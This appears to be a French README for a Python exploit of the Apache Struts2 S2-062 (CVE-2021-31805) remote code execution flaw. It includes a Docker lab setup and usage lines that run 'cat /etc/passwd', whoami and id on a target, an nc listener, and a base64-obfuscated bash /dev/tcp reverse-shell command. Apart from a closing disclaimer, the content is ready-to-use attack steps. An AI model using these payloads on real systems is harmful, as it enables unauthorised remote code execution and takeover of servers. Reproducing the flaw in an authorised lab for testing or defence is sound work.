
Exploit Python pour l'exécution de code à distance Apache Struts2 S2-062 (CVE-2021-31805), avec environnement de reproduction basé sur Docker et génération de payload de shell inversé.
Vulnérabilité d'exécution de code à distance Apache Struts2 S2-062 (CVE-2021-31805) | Reverse Shell
docker-compose.yml
version: '2'
services:
struts2:
image: vulhub/struts2:2.5.25
ports:
- "8080:8080"
Tirer l'image et démarrer l'environnement
docker-compose up -d
Adresse d'accès : http://1.1.1.1:8080
python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action "cat /etc/passwd"

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action whoami

python Struts2_S2-062_CVE-2021-31805.py http://1.1.1.1:8080/index.action id

nc -lvvp 8081

Construire le script de reverse shell encodé en base64, en utilisant le site suivant : https://ir0ny.top/pentest/reverse-encoder-shell.html

python CVE-2021-31805_Shell.py http://1.1.1.1:8080/index.action "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvODA4MCAwPiYx}|{base64,-d}|{bash,-i}"


Ne pas utiliser à des fins illégales, uniquement pour des tests de sécurité, sinon les conséquences ne sont pas liées à ce projet. Remarque : tester les sites uniquement avec une autorisation légitime : pirater des sites sans autorisation, c'est faire pleurer ses proches.